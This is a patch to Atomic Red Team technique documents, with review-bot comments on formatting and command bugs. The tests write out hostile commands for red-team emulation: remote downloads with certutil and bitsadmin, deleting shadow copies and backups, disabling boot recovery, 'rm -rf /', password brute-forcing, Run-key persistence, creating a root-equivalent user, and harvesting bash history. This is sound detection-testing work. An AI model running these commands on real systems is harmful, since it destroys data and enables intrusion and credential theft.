| remote_file | URL of file to copy | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt|
| local_path | Local path to place file | Path | Atomic-license.txt|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
cmd /c certutil -urlcache -split -f #{remote_file} #{local_path}
```
@@ -184,8 +177,7 @@ Use certutil -verifyctl argument to download a file from the web. Note - /verify
| remote_file | URL of file to copy | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt|
| local_path | Local path to place file | Path | Atomic-license.txt|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
$datePath = "certutil-$(Get-Date -format yyyy_MM_dd_HH_mm)"
New-Item -Path $datePath -ItemType Directory
Set-Location $datePath
@@ -209,8 +201,7 @@ This technique is used by Qbot malware to download payloads.
| remote_file | URL of file to copy | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt|
| local_path | Local path to place file | Path | Atomic-license.txt|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
C:\Windows\System32\bitsadmin.exe /transfer #{bits_job_name} /Priority HIGH #{remote_file} #{local_path}
```
diff --git a/atomics/T1107/T1107.md b/atomics/T1107/T1107.md
index b72842d2..193d78d4 100644
--- a/atomics/T1107/T1107.md
+++ b/atomics/T1107/T1107.md
@@ -44,8 +44,7 @@ Delete a single file from the temporary directory
|------|-------------|------|---------------|
| file_to_delete | Path of file to delete | Path | /tmp/victim-files/a|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
rm -f #{file_to_delete}
```
@@ -62,8 +61,7 @@ Recursively delete the temporary directory and all files contained within it
|------|-------------|------|---------------|
| folder_to_delete | Path of folder to delete | Path | /tmp/victim-files|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
rm -rf #{folder_to_delete}
```
@@ -80,8 +78,7 @@ Use the `shred` command to overwrite the temporary file and then delete it
|------|-------------|------|---------------|
| file_to_shred | Path of file to shred | Path | /tmp/victim-shred.txt|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
shred -u #{file_to_shred}
```
@@ -98,8 +95,7 @@ Delete a single file from the temporary directory using cmd.exe
|------|-------------|------|---------------|
| file_to_delete | Path of file to delete | Path | C:\Windows\Temp\victim-files-cmd\a|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
del /f #{file_to_delete}
```
@@ -116,8 +112,7 @@ Recursively delete the temporary directory and all files contained within it usi
|------|-------------|------|---------------|
| folder_to_delete | Path of folder to delete | Path | C:\Windows\Temp\victim-files-cmd|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
del /f /S #{folder_to_delete}
```
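Review bot: the heading says the directory is deleted recursively, but `del /f /S #{folder_to_delete}` only deletes files and leaves the directory tree in place; `rmdir /s /q #{folder_to_delete}` removes the folder and its contents. The fence should sit on its own line after the heading, not appended to it.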
@@ -134,8 +129,7 @@ Delete a single file from the temporary directory using Powershell
|------|-------------|------|---------------|
| file_to_delete | Path of file to delete | Path | C:\Windows\Temp\victim-files-ps\a|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
Remove-Item -path "#{file_to_delete}"
```
@@ -152,8 +146,7 @@ Recursively delete the temporary directory and all files contained within it usi
|------|-------------|------|---------------|
| folder_to_delete | Path of folder to delete | Path | C:\Windows\Temp\victim-files-ps|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
Remove-Item -path "#{folder_to_delete}" -recurse
```
@@ -165,8 +158,7 @@ Delete all volume shadow copies with vssadmin.exe
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
vssadmin.exe Delete Shadows /All /Quiet
```
@@ -178,8 +170,7 @@ Delete all volume shadow copies with wmic
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
wmic shadowcopy delete
```
@@ -191,8 +182,7 @@ This test leverages `bcdedit` to remove boot-time recovery measures.
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
```
@@ -205,8 +195,7 @@ This test deletes Windows Backup catalogs.
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
wbadmin delete catalog -quiet
```
@@ -218,8 +207,7 @@ This test deletes the entire root filesystem of a Linux system. This technique w
**Supported Platforms:** Linux, CentOS, Ubuntu
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
rm -rf / --no-preserve-root > /dev/null 2> /dev/null
```
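Review bot: this is the one test in the file that irreversibly destroys the host, so the fence merge matters most here: with the fence on the heading line the command renders as ordinary text that is easy to copy without noticing it is a test body, and the closing fence then opens a code block that runs into the next file. Keep the heading, a separate warning line (this patch already uses `Elevation Required (e.g. root or admin)` for that purpose elsewhere), and a fence on its own line. `rm -rf / --no-preserve-root > /dev/null 2> /dev/null` also discards every error, so the test gives no feedback at all if it is not run as root.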
diff --git a/atomics/T1110/T1110.md b/atomics/T1110/T1110.md
index 3688a13c..ceb3c7ba 100644
--- a/atomics/T1110/T1110.md
+++ b/atomics/T1110/T1110.md
@@ -47,8 +47,7 @@ Creates username and password files then attempts to brute force on remote host
| remote_host | Hostname of the target system we will brute force upon | String | \\COMPANYDC1\IPC$|
| domain | Domain name of the target system we will brute force upon | String | YOUR_COMPANY|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
net user /domain > #{input_file_users}
echo "Password1" >> #{input_file_passwords}
echo "1q2w3e4r" >> #{input_file_passwords}
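Review bot: in cmd.exe `echo "Password1" >> #{input_file_passwords}` writes the quotes into the file, so the password list contains `"Password1"` and `"1q2w3e4r"` and every guess fails for the wrong reason. Drop the quotes and the space before the redirect (`echo Password1>> #{input_file_passwords}`) so no trailing space is appended either. Keep the fence on its own line rather than on the heading.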
diff --git a/atomics/T1112/T1112.md b/atomics/T1112/T1112.md
index 06ad2d53..f47edeb8 100644
--- a/atomics/T1112/T1112.md
+++ b/atomics/T1112/T1112.md
@@ -25,8 +25,7 @@ Modify the registry of the currently logged in user using reg.exe cia cmd consol
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /t REG_DWORD /v HideFileExt /d 1 /f
```
@@ -39,8 +38,7 @@ CMD is ran as Administrative rights.
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /t REG_EXPAND_SZ /v SecurityHealth /d {some_other_executable} /f
```
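Review bot: `/d {some_other_executable}` is a literal placeholder, not a `#{...}` input, so the test writes the string `{some_other_executable}` into the Run key and there is no input-table entry through which a real path could be supplied. Add an executable input and reference it as `#{executable}`. Put the fence on its own line below the heading so the reg command renders as code.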
@@ -52,8 +50,7 @@ Modify a registry key of each user profile not currently loaded on the machine u
**Supported Platforms:** Windows
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
# here is an example of using the same method of reg load, but without the New-PSDrive cmdlet.
# Here we can load all unloaded user hives and do whatever we want in the location below (comments)
$PatternSID = 'S-1-5-21-\d+-\d+\-\d+\-\d+$'
diff --git a/atomics/T1113/T1113.md b/atomics/T1113/T1113.md
index 01bf29ce..b5f3eb36 100644
--- a/atomics/T1113/T1113.md
+++ b/atomics/T1113/T1113.md
@@ -35,8 +35,7 @@ Use screencapture command to collect a full desktop screenshot
| output_file | xxx
| Path | desktop.png|
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
screencapture
```
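Review bot: the input row is split across two lines (`| output_file | xxx` then `| Path | desktop.png|`), so the table does not render, and the description is still the `xxx` placeholder; the command `screencapture` also ignores `#{output_file}` and writes to the default location. Use `screencapture #{output_file}` and rejoin the row with a real description. The three screenshot tests that follow have the same table and placeholder problem. The fence must start its own line, not the heading.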
@@ -54,8 +53,7 @@ Use screencapture command to collect a full desktop screenshot
| output_file | xxx
| Path | desktop.png|
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
screencapture -x
```
@@ -73,8 +71,7 @@ Use xwd command to collect a full desktop screenshot and review file with xwud
| output_file | xxx
| Path | desktop.xwd|
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
xwd -root -out #{output_file}
xwud -in #{output_file}
```
@@ -93,8 +90,7 @@ Use import command to collect a full desktop screenshot
| output_file | xxx
| Path | desktop.png|
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
import -window root
```
diff --git a/atomics/T1114/T1114.md b/atomics/T1114/T1114.md
index 555a6561..b010105c 100644
--- a/atomics/T1114/T1114.md
+++ b/atomics/T1114/T1114.md
@@ -21,8 +21,7 @@ Search through local Outlook installation, extract mail, compress the contents,
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
Display email contents in the terminal
PS C:\> .\Get-Inbox.ps1
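Review bot: the body under `command_prompt` is prose (`Display email contents in the terminal`) followed by a PowerShell prompt transcript (`PS C:\> .\Get-Inbox.ps1`), so nothing here can be executed as a cmd command. Move the explanation above the fence, change the executor to `powershell`, and make the command `.\Get-Inbox.ps1` without the prompt. Put the fence on its own line below the heading.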
diff --git a/atomics/T1115/T1115.md b/atomics/T1115/T1115.md
index d19b23f9..a7bbce56 100644
--- a/atomics/T1115/T1115.md
+++ b/atomics/T1115/T1115.md
@@ -25,8 +25,7 @@ Add data to clipboard to copy off or execute commands from.
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
dir | clip
clip < readme.txt
```
@@ -39,8 +38,7 @@ Utilize PowerShell to echo a command to clipboard and execute it
**Supported Platforms:** Windows
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
echo Get-Process | clip
Get-Clipboard | iex
```
diff --git a/atomics/T1117/T1117.md b/atomics/T1117/T1117.md
index c6c237ae..feba33a3 100644
--- a/atomics/T1117/T1117.md
+++ b/atomics/T1117/T1117.md
@@ -30,8 +30,7 @@ Regsvr32.exe is a command-line program used to register and unregister OLE contr
|------|-------------|------|---------------|
| filename | Name of the local file, include path. | Path | C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
regsvr32.exe /s /u /i:#(unknown) scrobj.dll
```
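Review bot: `regsvr32.exe /s /u /i:#(unknown) scrobj.dll` has `#(unknown)` where `#{filename}` should be; the input table directly above defines `filename`, so the test currently runs with a bogus argument. The same `#(unknown)` token appears in the T1118 and T1127 tests in this patch. Keep the fence on its own line after the heading.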
@@ -48,8 +47,7 @@ Regsvr32.exe is a command-line program used to register and unregister OLE contr
|------|-------------|------|---------------|
| url | URL to hosted sct file | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
regsvr32.exe /s /u /i:#{url} scrobj.dll
```
@@ -66,8 +64,7 @@ Regsvr32.exe is a command-line program used to register and unregister OLE contr
|------|-------------|------|---------------|
| dll_name | Name of DLL to Execute, DLL Should export DllRegisterServer | Path | C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
"IF "%PROCESSOR_ARCHITECTURE%"=="AMD64" (C:\Windows\syswow64\regsvr32.exe /s #{dll_name}) ELSE ( regsvr32.exe /s #{dll_name} )"
```
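Review bot: the whole line is wrapped in double quotes (`"IF "%PROCESSOR_ARCHITECTURE%"=="AMD64" (...) ELSE (...)"`), so cmd.exe looks for a program whose name begins with `IF ` instead of evaluating the conditional; remove the outer quotes. The fence belongs on its own line rather than on the heading.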
diff --git a/atomics/T1118/T1118.md b/atomics/T1118/T1118.md
index 147e1b2e..940ac5a1 100644
--- a/atomics/T1118/T1118.md
+++ b/atomics/T1118/T1118.md
@@ -24,8 +24,7 @@ Executes the Uninstall Method
|------|-------------|------|---------------|
| filename | location of the payload | Path | C:\AtomicRedTeam\atomics\T1118\src\T1118.dll|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /target:library /out:C:\AtomicRedTeam\atomics\T1118\src\T1118.dll C:\AtomicRedTeam\atomics\T1118\src\T1118.cs
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U #(unknown)
```
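Review bot: `InstallUtil.exe /logfile= /LogToConsole=false /U #(unknown)` uses `#(unknown)` instead of `#{filename}`, and the csc.exe line hard-codes its `/out:` path rather than using `/out:#{filename}`, so the compiled DLL and the uninstall call can end up referring to different files if the input is changed. Use the input in both lines. Keep the fence on its own line.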
@@ -43,8 +42,7 @@ Executes the Uninstall Method
|------|-------------|------|---------------|
| filename | location of the payload | Path | C:\AtomicRedTeam\atomics\T1118\src\T1118.dll|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /target:library /out:C:\AtomicRedTeam\atomics\T1118\src\T1118.dll C:\AtomicRedTeam\atomics\T1118\src\T1118.cs
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /? #(unknown)
```
diff --git a/atomics/T1119/T1119.md b/atomics/T1119/T1119.md
index f4ff6359..f5644b27 100644
--- a/atomics/T1119/T1119.md
+++ b/atomics/T1119/T1119.md
@@ -19,8 +19,7 @@ Automated Collection
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
dir c: /b /s .docx | findstr /e .docx
for /R c: %f in (*.docx) do copy %f c:\temp\
```
@@ -33,8 +32,7 @@ Automated Collection
**Supported Platforms:** Windows
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
Get-ChildItem -Recurse -Include *.doc | % {Copy-Item $_.FullName -destination c:\temp}
```
diff --git a/atomics/T1121/T1121.md b/atomics/T1121/T1121.md
index cb09261a..574af610 100644
--- a/atomics/T1121/T1121.md
+++ b/atomics/T1121/T1121.md
@@ -25,8 +25,7 @@ Executes the Uninstall Method, No Admin Rights Required
| file_name | Location of the payload | Path | T1121.dll|
| source_file | Location of the CSharp source_file | Path | C:\AtomicRedTeam\atomics\T1121\src\T1121.cs|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library #{source_file}
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U #{file_name}
del #{file_name}
@@ -46,8 +45,7 @@ Executes the Uninstall Method, No Admin Rights Required, Requires SNK
| file_name | Location of the payload | Path | T1121.dll|
| source_file | Location of the CSharp source_file | Path | C:\AtomicRedTeam\atomics\T1121\src\T1121.cs|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
$key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4='
$Content = [System.Convert]::FromBase64String($key)
Set-Content key.snk -Value $Content -Encoding Byte
diff --git a/atomics/T1122/T1122.md b/atomics/T1122/T1122.md
index e252d504..82bcad69 100644
--- a/atomics/T1122/T1122.md
+++ b/atomics/T1122/T1122.md
@@ -15,8 +15,7 @@ Hijack COM Object used by certutil.exe
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
reg import ..\src\COMHijack.reg
certutil.exe -CAInfo
reg import ..\src\COMHijackCleanup.reg
diff --git a/atomics/T1123/T1123.md b/atomics/T1123/T1123.md
index a15b88cc..da5bd268 100644
--- a/atomics/T1123/T1123.md
+++ b/atomics/T1123/T1123.md
@@ -25,8 +25,7 @@ Create a file called test.wma, with the duration of 30 seconds
| output_file | Path to the recording file being captured | Path | test.wma|
| duration_hms | Duration of audio to be recorded (in h:m:s format) | Path | 30|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
SoundRecorder /FILE #{output_file} /DURATION #{duration_hms}
```
@@ -38,8 +37,7 @@ SoundRecorder /FILE #{output_file} /DURATION #{duration_hms}
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
powershell.exe -Command WindowsAudioDevice-Powershell-Cmdlet
```
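Review bot: `powershell.exe -Command WindowsAudioDevice-Powershell-Cmdlet` names a placeholder rather than an existing cmdlet, so this fails with a command-not-found error; either reference the module or script the test depends on (and list it as a prerequisite) or remove the test. With the fence on the heading line the reader cannot even tell this is meant to be a command.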
diff --git a/atomics/T1124/T1124.md b/atomics/T1124/T1124.md
index 018d215e..baf90010 100644
--- a/atomics/T1124/T1124.md
+++ b/atomics/T1124/T1124.md
@@ -24,8 +24,7 @@ Identify the system time
|------|-------------|------|---------------|
| computer_name | computer name to query | string | computer1|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
net time \\#{computer_name}
w32tm /tz
```
@@ -38,8 +37,7 @@ Identify the system time via PowerShell
**Supported Platforms:** Windows
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
Get-Date
```
diff --git a/atomics/T1126/T1126.md b/atomics/T1126/T1126.md
index 4093e693..864ae9de 100644
--- a/atomics/T1126/T1126.md
+++ b/atomics/T1126/T1126.md
@@ -26,8 +26,7 @@ Add a Network Share utilizing the command_prompt
|------|-------------|------|---------------|
| share_name | Share to add. | string | \\test\share|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
net use c: #{share_name}
net share test=#{share_name} /REMARK:"test share" /CACHE:No
```
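Review bot: `net use c: #{share_name}` tries to map a share onto C:, which is the system drive and cannot be a mapped drive letter, and `net share test=#{share_name}` expects a local directory as the share target rather than the UNC path `\\test\share` the input defaults to, so both lines fail as written. Pick an unused letter for the mapping and add a local-directory input for the share. Keep the fence on its own line.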
@@ -45,8 +44,7 @@ Removes a Network Share utilizing the command_prompt
|------|-------------|------|---------------|
| share_name | Share to remove. | string | \\test\share|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
net share #{share_name} /delete
```
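Review bot: `net share #{share_name} /delete` takes the share name (`test`, as created by the previous test), not the UNC path `\\test\share` that the input defaults to, so with the default value the delete removes nothing. Align the input default with the name the add test creates. The fence should be on its own line under the heading.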
@@ -63,8 +61,7 @@ Removes a Network Share utilizing PowerShell
|------|-------------|------|---------------|
| share_name | Share to remove. | string | \\test\share|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
Remove-SmbShare -Name #{share_name}
Remove-FileShare -Name #{share_name}
```
diff --git a/atomics/T1127/T1127.md b/atomics/T1127/T1127.md
index 024c9d09..946a087a 100644
--- a/atomics/T1127/T1127.md
+++ b/atomics/T1127/T1127.md
@@ -52,8 +52,7 @@ Executes the code in a project file using. C# Example
|------|-------------|------|---------------|
| filename | Location of the project file | Path | T1127.csproj|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe #(unknown)
```
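Review bot: `msbuild.exe #(unknown)` has `#(unknown)` where `#{filename}` (defined in the table just above with default `T1127.csproj`) should be substituted. Keep the fence on a line of its own so the command renders as code.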
diff --git a/atomics/T1128/T1128.md b/atomics/T1128/T1128.md
index 36a75917..41717a40 100644
--- a/atomics/T1128/T1128.md
+++ b/atomics/T1128/T1128.md
@@ -24,8 +24,7 @@ Netsh interacts with other operating system components using dynamic-link librar
|------|-------------|------|---------------|
| helper_file | Path to DLL | Path | C:\Path\file.dll|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
netsh.exe add helper #{helper_file}
```
diff --git a/atomics/T1130/T1130.md b/atomics/T1130/T1130.md
index 7f5938ff..09ba3e87 100644
--- a/atomics/T1130/T1130.md
+++ b/atomics/T1130/T1130.md
@@ -29,8 +29,7 @@ Creates a root CA with openssl
| key_filename | Key we create that is used to create the CA certificate | Path | rootCA.key|
| cert_filename | Path of the CA certificate we create | Path | rootCA.crt|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
openssl genrsa -out #{key_filename} 4096
openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -out #{cert_filename}
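Review bot: the two openssl commands lose their code block because the opening fence was appended to the heading; the hunk also ends inside the block, so the breakage extends past the lines shown here. Keep the fence on its own line.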
diff --git a/atomics/T1132/T1132.md b/atomics/T1132/T1132.md
index 9f787156..02c2487c 100644
--- a/atomics/T1132/T1132.md
+++ b/atomics/T1132/T1132.md
@@ -21,8 +21,7 @@ Utilizing a common technique for posting base64 encoded data.
| destination_url | Destination URL to post encoded data. | string | redcanary.com|
| base64_data | Encoded data to post using fake Social Security number 111-11-1111. | string | MTExLTExLTExMTE=|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
echo -n 111-11-1111 | base64
curl -XPOST #{base64_data}.#{destination_url}
```
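Review bot: beyond the fence being folded into the heading (which drops both commands out of the code block), the output of `echo -n 111-11-1111 | base64` is never fed into `#{base64_data}`; the curl line uses the constant from the input table, so the first line only documents how that constant was produced. The description should say so, and the fence belongs on its own line.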
diff --git a/atomics/T1134/T1134.md b/atomics/T1134/T1134.md
index d800911d..88041e05 100644
--- a/atomics/T1134/T1134.md
+++ b/atomics/T1134/T1134.md
@@ -35,8 +35,7 @@ Requires Administrator Privileges To Execute Test
|------|-------------|------|---------------|
| target_user | Username To Steal Token From | String | SYSTEM|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
#list processes by user,
$owners = @{}
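Review bot: the opening fence is merged into the heading, so `#list processes by user,` and `$owners = @{}` render as ordinary markdown text rather than PowerShell. Restore the fence line; the hunk cuts off inside the script, so the whole block is affected.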
diff --git a/atomics/T1135/T1135.md b/atomics/T1135/T1135.md
index 04f1b719..66fc9d61 100644
--- a/atomics/T1135/T1135.md
+++ b/atomics/T1135/T1135.md
@@ -36,8 +36,7 @@ Network Share Discovery
|------|-------------|------|---------------|
| computer_name | Computer name to find a mount on. | string | computer1|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
df -aH
smbutil view -g //#{computer_name}
showmount #{computer_name}
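Review bot: the fence folded onto the heading leaves `df -aH`, `smbutil view -g //#{computer_name}` and `showmount #{computer_name}` as running text, and the hunk ends before the closing fence, so the rest of the block is affected too. Emit the fence on a separate line.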
@@ -56,8 +55,7 @@ Network Share Discovery utilizing the command prompt
|------|-------------|------|---------------|
| computer_name | Computer name to find a mount on. | string | computer1|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
net view \\#{computer_name}
```
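Review bot: same regression: `net view \\#{computer_name}` is no longer inside a code block, and in plain markdown the doubled backslash is an escape that collapses to a single one, so the rendered command is wrong. Keep the fence on its own line.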
@@ -74,8 +72,7 @@ Network Share Discovery utilizing PowerShell
|------|-------------|------|---------------|
| computer_name | Computer name to find a mount on. | string | computer1|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
net view \\#{computer_name}
get-smbshare -Name #{computer_name}
```
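Review bot: in addition to the merged fence (which also turns `\\#{computer_name}` into a single backslash once rendered as text), `get-smbshare -Name #{computer_name}` passes a computer name where Get-SmbShare's -Name parameter expects a share name, so that line does not do the remote share discovery the section title describes; the description should state what it is meant to show. Fence on its own line.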
diff --git a/atomics/T1136/T1136.md b/atomics/T1136/T1136.md
index a696863c..ac02069b 100644
--- a/atomics/T1136/T1136.md
+++ b/atomics/T1136/T1136.md
@@ -31,8 +31,7 @@ Create a user via useradd
| username | Username of the user to create | String | evil_user|
| comment | Comment to record when creating the user | String | Evil Account|
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
useradd -M -N -r -s /bin/bash -c "#{comment}" #{username}
```
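Review bot: `useradd -M -N -r -s /bin/bash -c "#{comment}" #{username}` is dropped out of its code block by the fence being appended to the heading. Restore the fence line.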
@@ -50,8 +49,7 @@ Creates a user on a MacOS system with dscl
| username | Username of the user to create | String | evil_user|
| realname | 'realname' to record when creating the user | String | Evil Account|
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
dscl . -create /Users/#{username}
dscl . -create /Users/#{username} UserShell /bin/bash
dscl . -create /Users/#{username} RealName "#{realname}"
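Review bot: fence regression for the dscl block; the three `dscl . -create /Users/#{username} ...` lines become a paragraph, and since the hunk ends inside the block the damage extends to the lines after it. Keep the fence separate from the heading.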
@@ -73,8 +71,7 @@ Creates a new user in a command prompt
|------|-------------|------|---------------|
| username | Username of the user to create | String | Evil Account|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
net user /add #{username}
```
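Review bot: apart from the opening fence being merged into the heading, the default for `username` in the table above is `Evil Account`, which contains a space; `net user /add #{username}` would then receive `Account` as a separate argument. Fix the fence and either quote the placeholder or use a default without whitespace.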
@@ -91,8 +88,7 @@ Creates a new user in PowerShell
|------|-------------|------|---------------|
| username | Username of the user to create | String | Evil Account|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
New-LocalUser -Name #{username} -NoPassword
net user /add #{username}
```
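Review bot: same quoting problem as the command-prompt variant: with the default `Evil Account`, both `New-LocalUser -Name #{username} -NoPassword` and `net user /add #{username}` get an unquoted name containing a space; the second line also retries creating a user the first line already created, so it fails once the first succeeds. And the opening fence must not be appended to the heading.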
@@ -111,8 +107,7 @@ Creates a new user in Linux and adds the user to the `root` group. This techniqu
| username | Username of the user to create | String | butter|
| password | Password of the user to create | String | BetterWithButter|
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
useradd -o -u 0 -g 0 -M -d /root -s /bin/bash #{username}
echo "#{password}" | passwd --stdin #{username}
```
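Review bot: `passwd --stdin` is a Red Hat/Fedora extension that the Debian/Ubuntu `passwd` does not accept, so the second line fails on those platforms and the Supported Platforms line should be scoped accordingly. The opening fence also needs to go back on its own line so the two commands stay in a code block.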
diff --git a/atomics/T1137/T1137.md b/atomics/T1137/T1137.md
index 9e4c5da7..03073720 100644
--- a/atomics/T1137/T1137.md
+++ b/atomics/T1137/T1137.md
@@ -58,8 +58,7 @@ Word VBA Macro
**Supported Platforms:** Windows
-#### Run it with these steps!
-1. Open Word
+#### Run it with these steps! 1. Open Word
2. Insert tab -> Quick Parts -> Field
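Review bot: `1. Open Word` has been folded into the heading, so the rendered heading reads "Run it with these steps! 1. Open Word" and the ordered list starts at step 2. The step list needs to begin on the line after the heading.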
diff --git a/atomics/T1138/T1138.md b/atomics/T1138/T1138.md
index ee5354a1..92348bd7 100644
--- a/atomics/T1138/T1138.md
+++ b/atomics/T1138/T1138.md
@@ -36,8 +36,7 @@ place to start.
|------|-------------|------|---------------|
| file_path | Path to the shim databaase file | String | C:\AtomicRedTeam\atomics\T1138\src\AtomicShimx86.sdb|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
sdbinst.exe #{file_path}
sdbinst.exe -u #{file_path}
```
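Review bot: the opening fence folded into the heading removes the code block around the two `sdbinst.exe` lines. Unrelated but visible in the context: `databaase` in the `file_path` row is a typo for `database`.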
diff --git a/atomics/T1139/T1139.md b/atomics/T1139/T1139.md
index 3097ce34..94087c72 100644
--- a/atomics/T1139/T1139.md
+++ b/atomics/T1139/T1139.md
@@ -22,8 +22,7 @@ xxxx
| bash_history_grep_args | grep arguments that filter out specific commands we want to capture | Path | -e '-p ' -e 'pass' -e 'ssh'|
| output_file | Path where captured results will be placed | Path | ~/loot.txt|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
cat #{bash_history_filename} | grep #{bash_history_grep_args} > #{output_file}
```
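Review bot: fence appended to the heading; the `cat ... | grep ... > #{output_file}` pipeline then renders as text, where `>` and `|` are easy to misread. Separate line for the fence.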
diff --git a/atomics/T1140/T1140.md b/atomics/T1140/T1140.md
index 06c3d588..4434a757 100644
--- a/atomics/T1140/T1140.md
+++ b/atomics/T1140/T1140.md
@@ -28,8 +28,7 @@ Encode/Decode executable
|------|-------------|------|---------------|
| executable | name of executable | path | c:\file.exe|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
certutil.exe -encode #{executable} file.txt
certutil.exe -decode file.txt #{executable}
```
